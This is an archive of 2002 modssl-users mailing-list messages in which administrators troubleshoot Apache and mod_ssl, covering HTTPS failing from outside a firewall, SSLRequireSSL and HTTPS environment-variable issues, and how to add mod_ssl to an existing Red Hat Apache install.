In-Reply-To: <3DA00A61.23617.4AE22F@localhost>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeffrey Burgoyne 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


How about a simple test to ensure it is not the firewall. Set apache to
listen to HTTPS across port 80, which you already know works outside the
firewall. Then you can easily test to ensure it is not the firewall.

Jeff


On Sun, 6 Oct 2002, Jeff Umstead wrote:

> I've recently added a Red Hat 7.3 Linux server to our network running Apache and 
> mod_ssl.  My problem is I can't make an https (over standard port 443) connection from 
> outside our network.  I can connect via http (port 80) from both inside and outside our 
> LAN.  
> 
> I have the necessary port pass throughs, firewall rules etc in place for both ports.  It 
> works perfectly from inside our lan (subnet) to either http or https but not from our other 
> sites (different subnets) or from the internet.
> 
> I believe the problem is either an incorrect setting in httpd.conf or perhaps in a network 
> configuration file I've overlooked.  Or ???
> 
> Any help / tips  would be greatly appreciated.
> 
> Thanks
> --
> Jeff Umstead
> IS Director
> Merrill Tool Holding Company
> Saginaw MI USA
> 
> 
> 
> This e-mail (and attachment(s)) has been virus scanned by
> McAfee WebShield.
> 
> This message is intended only for use of the individual or
> entity to whom it is addressed, and may contain information
> that is privileged, confidential and exempt from disclosure
> under applicable law.  If the reader of this message is not
> the intended recipient, or the employee or agent
> responsible for delivering the message to the intended
> recipient, you are hereby notified that any unauthorized
> use, dissemination, distribution or copying of this e-mail
> or attachments, in whole or in part is strictly prohibited
> and may be unlawful.  If you have received this message in
> error, please inform the sender by replying to this message
> and then delete the message and any attachments from your
> system and destroy all copies. Thank You
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Oct  6 17:06:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA09020; Sun, 6 Oct 2002 17:05:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.merritech.com id RAA08736; Sun, 6 Oct 2002 17:04:02 +0200 (MET DST)
Received: from unknown(200.0.0.115) by mail.merritech.com via csmap 
	 id 11759; Sun, 06 Oct 2002 11:02:20 -0400 (EDT)
Received: from Spooler by merritech (Mercury/32 v3.32) ID MO000DE2;
  6 Oct 02 11:04:00 -0400
Received: from spooler by merritech.com (Mercury/32 v3.32); 6 Oct 02 11:03:49 -0400
Received: from bordermgr1.mth (200.0.0.113) by merritech (Mercury/32 v3.32) with ESMTP ID MG000DE1;
   6 Oct 02 11:03:40 -0400
Received: from BORDERMGR1/SpoolDir by bordermgr1.mth (Mercury 1.48);
    6 Oct 02 11:03:35 -0500
Received: from SpoolDir by BORDERMGR1 (Mercury 1.48); 6 Oct 02 11:03:14 -0500
Received: from umsteadj (64.91.25.128) by bordermgr1.mth (Mercury 1.48) with ESMTP;
    6 Oct 02 11:03:10 -0500
From: "Jeff Umstead" 
To: modssl-users@modssl.org
Date: Sun, 06 Oct 2002 11:03:15 -0400
MIME-Version: 1.0
Subject: Re: SSL Not Working from Outside LAN
Message-ID: <3DA01873.15734.81DC34@localhost>
References: <3DA00A61.23617.4AE22F@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.02a)
Content-type: text/plain
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-NAIMIME-Disclaimer: 1
X-NAIMIME-Modified: 1
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Umstead" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Good idea!  I'll have to wait until tomorrow to try that.  

I did however do some packet sniffing and noticed that tcp packets 
from outside the firewall do get to the web server and the web 
server returns tcp packets.  But never returns any SSL ( actually 
SSLv2 protocol I think) packets.  Watching the packets for http the 
tcp and http packets pass back and forth.

Thanks
--
Jeff Umstead
IS Director
Merrill Tool Holding Company
Saginaw MI USA


On 6 Oct 2002 at 10:10, Jeffrey Burgoyne wrote:

> 
> How about a simple test to ensure it is not the firewall. Set apache
> to listen to HTTPS across port 80, which you already know works
> outside the firewall. Then you can easily test to ensure it is not 
the
> firewall.
> 
> Jeff
> 
> 
> On Sun, 6 Oct 2002, Jeff Umstead wrote:
> 
> > I've recently added a Red Hat 7.3 Linux server to our network
> > running Apache and mod_ssl.  My problem is I can't make an 
https
> > (over standard port 443) connection from outside our network.  
I can
> > connect via http (port 80) from both inside and outside our LAN.  
> > 
> > I have the necessary port pass throughs, firewall rules etc in 
place
> > for both ports.  It works perfectly from inside our lan (subnet) to
> > either http or https but not from our other sites (different
> > subnets) or from the internet.
> > 
> > I believe the problem is either an incorrect setting in httpd.conf
> > or perhaps in a network configuration file I've overlooked.  Or 
???
> > 
> > Any help / tips  would be greatly appreciated.
> > 



This e-mail (and attachment(s)) has been virus scanned by
McAfee WebShield.

This message is intended only for use of the individual or
entity to whom it is addressed, and may contain information
that is privileged, confidential and exempt from disclosure
under applicable law.  If the reader of this message is not
the intended recipient, or the employee or agent
responsible for delivering the message to the intended
recipient, you are hereby notified that any unauthorized
use, dissemination, distribution or copying of this e-mail
or attachments, in whole or in part is strictly prohibited
and may be unlawful.  If you have received this message in
error, please inform the sender by replying to this message
and then delete the message and any attachments from your
system and destroy all copies. Thank You


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Oct  6 20:40:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA13733; Sun, 6 Oct 2002 20:39:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts16-srv.bellnexxia.net id UAA13729; Sun, 6 Oct 2002 20:39:02 +0200 (MET DST)
Received: from sympatico.ca ([64.231.125.186])
          by tomts16-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021006183900.WPZC8339.tomts16-srv.bellnexxia.net@sympatico.ca>
          for ; Sun, 6 Oct 2002 14:39:00 -0400
Message-ID: <3DA0834D.8020102@sympatico.ca>
Date: Sun, 06 Oct 2002 14:39:09 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache 2.0.40 and OpenSSL
References: <6187787D77C6D111BC4B006008A2E26917795E@KRUSTY>
Content-Type: text/plain; charset=windows-1252; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Medina Malpica Victor wrote:
> Recently I needed a development environment based on Apache 2, php4 and 
> ssl for windows, it was and intranet application for a bank (that was 
> the reason for the ssl) I built a installer with the apache 2 and ssl, 
> and also included the MySQL data base.
> 
> It has performed just fine under medium load, haven't try it under heavy 
> load.
> 
> I put it in my university ftp, if you want you can download it and try 
> it, I believe they are quite stable.
> 
> You can send me email if you want some sort of support or comments on 
> how to improve it. I also have a sourceforge project but haven't upload 
> the latest release. (sourceforge.net/projects/ikirux)
> 
> The latest binary are here:
> 
> ftp://route.unitec.edu.ve/VictorMedina/IkiruxProject/
> 
> FileNamer: IKIRUX_WSP_Pro1Beta4_ENG.zip
> 
> Victor Medina
> PS: I would really apreaciate some feedback on this, bugs, etc
> 
> 
> 
> Legal Notice
> ------------
> 
> These software packages are provided free of charge. It uses strong
> cryptography that is regulated by export/import/use restrictions in some
> 
> parts of the world.
> 
> PLEASE NOTE THAT EXPORT/IMPORT/USE OF STRONG CRYPTOGRAPHY SOFTWARE,
> PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING TECHNICAL
> DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME PARTS OF THE
> WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR COUNTRY, RE-DISTRIBUTE
> IT FROM THERE OR EVEN JUST EMAIL TECHNICAL SUGGESTIONS OR SOURCE PATCHES
> 
> TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY ADVISED TO PAY CLOSE
> ATTENTION TO ANY EXPORT/IMPORT/USE LAWS WHICH APPLY TO YOU. WE NOR THE
> AUTHORS OF THE REPRESENTED SOFTWARE PACKAGES ARE OR WILL BE HELD LIABLE
> FOR ANY VIOLATIONS YOU MAKE. BE CAREFUL, IT IS YOUR RESPONSIBILITY.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

Victor,

I have sent a note to your university account describing a problem that 
you should address - regarding your installer.  Contact me if you need 
help understanding the issue - it is unrealated to apache or mod_ssl.

Chris.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Oct  6 21:47:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA15294; Sun, 6 Oct 2002 21:46:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA15286; Sun, 6 Oct 2002 21:45:54 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 2EDF24CE73D; Sun,  6 Oct 2002 21:45:57 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 86775286C5; Sun,  6 Oct 2002 21:44:59 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spielberg.vip.uk.com id UAA13951; Sun, 6 Oct 2002 20:49:40 +0200 (MET DST)
Received: from modem-206-18-60-62.vip.uk.com ([62.60.18.206] helo=c9e4h5)
	by spielberg.vip.uk.com with smtp (Exim 3.35 #2)
	id 17yGTB-0006Ow-00
	for modssl-users@modssl.org; Sun, 06 Oct 2002 19:49:38 +0100
Message-ID: <002701c26d69$03d0bb80$4a133c3e@c9e4h5>
From: "webmaster" 
To: 
References: <6187787D77C6D111BC4B006008A2E26917795E@KRUSTY> <3DA0834D.8020102@sympatico.ca>
Subject: Re: Apache 2.0.40 and OpenSSL
Date: Sun, 6 Oct 2002 19:48:18 +0100
Organization: HF UK
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "webmaster" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Victor,

Can you let me know what the issue is with the installer noted by chris

Dave


----- Original Message -----
From: "hunter" 
To: 
Sent: Sunday, October 06, 2002 7:39 PM
Subject: Re: Apache 2.0.40 and OpenSSL


> Medina Malpica Victor wrote:
> > Recently I needed a development environment based on Apache 2, php4 and
> > ssl for windows, it was and intranet application for a bank (that was
> > the reason for the ssl) I built a installer with the apache 2 and ssl,
> > and also included the MySQL data base.
> >
> > It has performed just fine under medium load, haven't try it under heavy
> > load.
> >
> > I put it in my university ftp, if you want you can download it and try
> > it, I believe they are quite stable.
> >
> > You can send me email if you want some sort of support or comments on
> > how to improve it. I also have a sourceforge project but haven't upload
> > the latest release. (sourceforge.net/projects/ikirux)
> >
> > The latest binary are here:
> >
> > ftp://route.unitec.edu.ve/VictorMedina/IkiruxProject/
> >
> > FileNamer: IKIRUX_WSP_Pro1Beta4_ENG.zip
> >
> > Victor Medina
> > PS: I would really apreaciate some feedback on this, bugs, etc
> >
> >
> >
> > Legal Notice
> > ------------
> >
> > These software packages are provided free of charge. It uses strong
> > cryptography that is regulated by export/import/use restrictions in some
> >
> > parts of the world.
> >
> > PLEASE NOTE THAT EXPORT/IMPORT/USE OF STRONG CRYPTOGRAPHY SOFTWARE,
> > PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING TECHNICAL
> > DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME PARTS OF THE
> > WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR COUNTRY, RE-DISTRIBUTE
> > IT FROM THERE OR EVEN JUST EMAIL TECHNICAL SUGGESTIONS OR SOURCE PATCHES
> >
> > TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY ADVISED TO PAY CLOSE
> > ATTENTION TO ANY EXPORT/IMPORT/USE LAWS WHICH APPLY TO YOU. WE NOR THE
> > AUTHORS OF THE REPRESENTED SOFTWARE PACKAGES ARE OR WILL BE HELD LIABLE
> > FOR ANY VIOLATIONS YOU MAKE. BE CAREFUL, IT IS YOUR RESPONSIBILITY.
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> Victor,
>
> I have sent a note to your university account describing a problem that
> you should address - regarding your installer.  Contact me if you need
> help understanding the issue - it is unrealated to apache or mod_ssl.
>
> Chris.
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 01:30:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA19931; Mon, 7 Oct 2002 01:29:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailhost.det2.ameritech.net id BAA19920; Mon, 7 Oct 2002 01:28:13 +0200 (MET DST)
Received: from danspc ([66.73.208.162]) by mailhost.det2.ameritech.net
          (InterMail vM.4.01.02.17 201-229-119) with ESMTP
          id <20021006232811.JCVN17736.mailhost.det2.ameritech.net@danspc>
          for ; Sun, 6 Oct 2002 19:28:11 -0400
From: "Dan Sabo" 
To: 
Subject: Installing mod_ssl
Date: Sun, 6 Oct 2002 19:30:46 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dan Sabo" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Folks,

mod_ssl newbie here.  I'm running RH Linux 7.3 and apache 1.3.23.  I have
been reading the archives and Kabir's book - "Red Hat Linux 7 Server", and
from what I understand, correct me if I'm wrong, is that in order to install
mod_ssl on my machine, I will have to start from scratch and re install and
compile a fresh copy of apache.  Is this true?  Or can I install mod_ssl on
an existing apache machine that has already been configured and set up with
e-commerce sites?

If I can install mod_ssl on my machine without re compiling apache, can
anyone direct me to any step by step documentation as to how to install and
configure mod_ssl and secure sites/Thawte certificates on a Linux 7.x box
already set up with apache?

Lastly, if it is possible to install mod_ssl on a server already configured
with apache with e-commerce sites already set up, are there any security
risks in installing mod_ssl on an already configured server?  Is it
"better", to install mod_ssl on an empty server?  Also I read somewhere that
this mod_ssl worm is a big problem.  Is that true?  Should I upgrade my
apache software to prevent such an attack, and if I do, will upgrading
apache cause any problems with my current set up of my sites?

Thanks much

Dan Sabo

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 03:12:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA21860; Mon, 7 Oct 2002 03:11:57 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from barr.cz id DAA21845; Mon, 7 Oct 2002 03:10:19 +0200 (MET DST)
Received: (qmail 5357 invoked from network); 7 Oct 2002 01:10:17 -0000
Received: from unknown (HELO barr.cz) (127.0.0.1)
  by localhost with SMTP; 7 Oct 2002 01:10:17 -0000
Received: from 10.10.10.2
        (SquirrelMail authenticated user krauso)
        by perfectprint.cz with HTTP;
        Mon, 7 Oct 2002 03:10:17 +0200 (CEST)
Message-ID: <1814.10.10.10.2.1033953017.squirrel@perfectprint.cz>
Date: Mon, 7 Oct 2002 03:10:17 +0200 (CEST)
Subject: environment variables and SSLRequireSSL problem
From: "Ondrej Kraus" 
To: 
X-Priority: 3
Importance: Normal
X-MSMail-Priority: Normal
X-Mailer: SquirrelMail (version 1.2.7)
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-2
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ondrej Kraus" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I have problem with environment variables and directive SSLRequireSSL.
SSL works, but I cannot test this in php script(_SERVER['HTTPS']) and
SSLRequireSSL directive denies my access to directory, which is accessed
via SSL.

Thank you for any idea.

Ondrej Kraus


related informations:

software versions:

Debian testing dist.
Apache 1.3.6
mod_ssl 2.8.9
OpenSSL 0.9.6g

fragment of httpd.conf:

Listen 80
LoadModule ssl_module /usr/lib/apache/1.3/mod_ssl.so
Port 80


    Listen xx.xx.xx.xx:443


NameVirtualHost *:80


    AddType application/x-x509-ca-cert .crt
    AddType application/x-pkcs7-crl    .crl
    SSLPassPhraseDialog  builtin
    SSLSessionCache         dbm:/var/run/ssl_scache
    SSLSessionCacheTimeout  300
    SSLMutex  file:/var/run/ssl_mutex
    SSLRandomSeed startup builtin
    SSLRandomSeed connect builtin

    
	ServerName server_name

	# this php application could not find HTTPS environment variable
	# actual dirty workaround: SetEnv HTTPS on
	DocumentRoot /home/app

	SSLEngine on
	SSLOptions +StdEnvVars
	SSLCertificateFile    ...
	SSLCACertificateFile  ...
	SSLCertificateKeyFile ...
	SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown

	Alias /mydir /home/mydir
    

    
	# no access, but if I comment it out, it works as expected (with SSL)
	SSLRequireSSL
    


# redirect works

  ServerName server_name
  Redirect permanent / https://server_name/mydir/




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 04:28:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA23665; Mon, 7 Oct 2002 04:28:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from 7thwave.technimode.com id EAA23643; Mon, 7 Oct 2002 04:26:30 +0200 (MET DST)
Received: from weaselxp (host217-45-3-51.in-addr.btopenworld.com [217.45.3.51])
	by 7thwave.technimode.com (8.11.3/8.11.3) with SMTP id g972QTl11766
	for ; Mon, 7 Oct 2002 03:26:29 +0100
Message-ID: <019d01c26da8$7b43f620$152ca8c0@dev.cyberws.co.uk>
From: "Phil Ellett" 
To: 
References: 
Subject: Re: Installing mod_ssl
Date: Mon, 7 Oct 2002 03:23:02 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2813.3000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2813.3000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Phil Ellett" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

My advice would be to install a completely new server from scratch and
install it in a different directory to your current Redhat installed one.

All you need do once the new install is complete is kill the old server and
restart the new one.  Once happy with the new install you can edit your
startup configuration so the new server is started on a reboot or restart.

Your can then either copy or symbolically link back to the content from your
original setup.

This way if it all goes wrong you can immediately switch back to the
previous server.

As for instructions the INSTALL documents included with the Apache and
Mod_SSL distros have a pretty good walk through procedure.

You will ideally need to install (from source or RPM) the latest version of
OpenSSL (at least 0.9.6e) before you start and then download the latest
version of Apache and Mod_SSL from the main sites (http://httpd.apache.org/
and http://www.modssl.org/)

Download the .... blaaaahh.tar.gz files  ..

Then issue the following command (in a suitable directory) to unpack them.

gzip -d -c blaaaahh.tar.gz | tar xvf -

The will then unpack the files into directories. Inside these your will find
the instructions (start with README and INSTALL).

Depending on how familar you are with scripting you can setup an install
script to run the various configure and make command used to build the
server from source. I use this to maintain the 6 Apache servers I run and
can rebuild each one from source in about 8 minutes flat.

To update servers at a later date simply do the following .... Download and
rebuild new server issuing every command except the final "make install".
Stop the current server. Renew current install directory (/usr/local/apache
for example) to /usr/local/apache.bak  ... then go back to the directory
where your made the new server and issue the "make install" command.  If
your web content exists outside of the /usr/local/apache directory (which
ideally it should), then all you need do now is copy the "httpd.conf" file
into the new /usr/local/apache directory and restart the server.  In case of
an problems stop the server, rename the directory back, restart and you are
back to where you started ... (easy once you've done it a few times !!!).


Regards,


Phil,

Sheffield,
England,
UK.
.
----- Original Message -----
From: "Dan Sabo" 
To: 
Sent: Monday, October 07, 2002 12:30 AM
Subject: Installing mod_ssl


> Hi Folks,
>
> mod_ssl newbie here.  I'm running RH Linux 7.3 and apache 1.3.23.  I have
> been reading the archives and Kabir's book - "Red Hat Linux 7 Server", and
> from what I understand, correct me if I'm wrong, is that in order to
install
> mod_ssl on my machine, I will have to start from scratch and re install
and
> compile a fresh copy of apache.  Is this true?  Or can I install mod_ssl
on
> an existing apache machine that has already been configured and set up
with
> e-commerce sites?
>
> If I can install mod_ssl on my machine without re compiling apache, can
> anyone direct me to any step by step documentation as to how to install
and
> configure mod_ssl and secure sites/Thawte certificates on a Linux 7.x box
> already set up with apache?
>
> Lastly, if it is possible to install mod_ssl on a server already
configured
> with apache with e-commerce sites already set up, are there any security
> risks in installing mod_ssl on an already configured server?  Is it
> "better", to install mod_ssl on an empty server?  Also I read somewhere
that
> this mod_ssl worm is a big problem.  Is that true?  Should I upgrade my
> apache software to prevent such an attack, and if I do, will upgrading
> apache cause any problems with my current set up of my sites?
>
> Thanks much
>
> Dan Sabo
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 04:44:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA23941; Mon, 7 Oct 2002 04:43:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailhost.det2.ameritech.net id EAA23926; Mon, 7 Oct 2002 04:42:20 +0200 (MET DST)
Received: from danspc ([66.73.208.162]) by mailhost.det2.ameritech.net
          (InterMail vM.4.01.02.17 201-229-119) with ESMTP
          id <20021007024218.LFJH17736.mailhost.det2.ameritech.net@danspc>
          for ; Sun, 6 Oct 2002 22:42:18 -0400
From: "Dan Sabo" 
To: 
Subject: RE: Installing mod_ssl
Date: Sun, 6 Oct 2002 22:44:51 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
In-reply-to: <019d01c26da8$7b43f620$152ca8c0@dev.cyberws.co.uk>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dan Sabo" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>My advice would be to install a completely new server from scratch and
>install it in a different directory to your current Redhat installed one.

Thanks for the info Phil!  Do I understand correctly, that I could keep my
existing e-commerce stores on line and just install a new apache server
independent of the existing apache setup on the same Linux machine?

>All you need do once the new install is complete is kill the old server and
>restart the new one.  Once happy with the new install you can edit your
>startup configuration so the new server is started on a reboot or restart.

If this is possible, would it be difficult to switch my stores that are
already set up over to the new apache server associated with mod_ssl?

>Your can then either copy or symbolically link back to the content from
your
>original setup.

Sounds a bit scary to me, would this be something I could hire out to an
expert?  I don't want to screw up live stores now that they are on line and
functional.

Could I have two independent apache servers on my Linux server running and
switch from one to the other?  And then just copy over my existing store
settings from httpd.conf into the new server once mod_ssl is set up?  Would
I have to delete my existing e-commerce sites and all associated files?  Or
leave them on my Linux machine and just move the httpd.conf file over the
newer apache server with the associated mod_ssl?  Would this be a
complicated process if I already have five e-commerce sites set up on the
machine?

Thanks,

Dan





Regards,


Phil,

Sheffield,
England,
UK.
.
----- Original Message -----
From: "Dan Sabo" 
To: 
Sent: Monday, October 07, 2002 12:30 AM
Subject: Installing mod_ssl


> Hi Folks,
>
> mod_ssl newbie here.  I'm running RH Linux 7.3 and apache 1.3.23.  I have
> been reading the archives and Kabir's book - "Red Hat Linux 7 Server", and
> from what I understand, correct me if I'm wrong, is that in order to
install
> mod_ssl on my machine, I will have to start from scratch and re install
and
> compile a fresh copy of apache.  Is this true?  Or can I install mod_ssl
on
> an existing apache machine that has already been configured and set up
with
> e-commerce sites?
>
> If I can install mod_ssl on my machine without re compiling apache, can
> anyone direct me to any step by step documentation as to how to install
and
> configure mod_ssl and secure sites/Thawte certificates on a Linux 7.x box
> already set up with apache?
>
> Lastly, if it is possible to install mod_ssl on a server already
configured
> with apache with e-commerce sites already set up, are there any security
> risks in installing mod_ssl on an already configured server?  Is it
> "better", to install mod_ssl on an empty server?  Also I read somewhere
that
> this mod_ssl worm is a big problem.  Is that true?  Should I upgrade my
> apache software to prevent such an attack, and if I do, will upgrading
> apache cause any problems with my current set up of my sites?
>
> Thanks much
>
> Dan Sabo
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct  7 05:01:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA24383; Mon, 7 Oct 2002 05:00:42 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailhost.det2.ameritech.net id EAA24263; Mon, 7 Oct 2002 04:59:36 +0200 (MET DST)
Received: from danspc ([66.73.208.162]) by mailhost.det2.ameritech.net
          (InterMail vM.4.01.02.17 201-229-119) with ESMTP
          id <20021007025934.LJZP17736.mailhost.det2.ameritech.net@danspc>
          for ; Sun, 6 Oct 2002 22:59:34 -0400
From: "Dan Sabo" 
To: 
Subject: RE: Installing mod_ssl
Date: Sun, 6 Oct 2002 23:02:07 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
In-reply-to: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dan Sabo" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

In other words, you are saying it's not possible or recommended to just
install mod_ssl into an existing apache/Linux setup?  It won't work or could
cause server errors or security risks?  Is that why you recommend a fresh
apache install?

Dan


>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
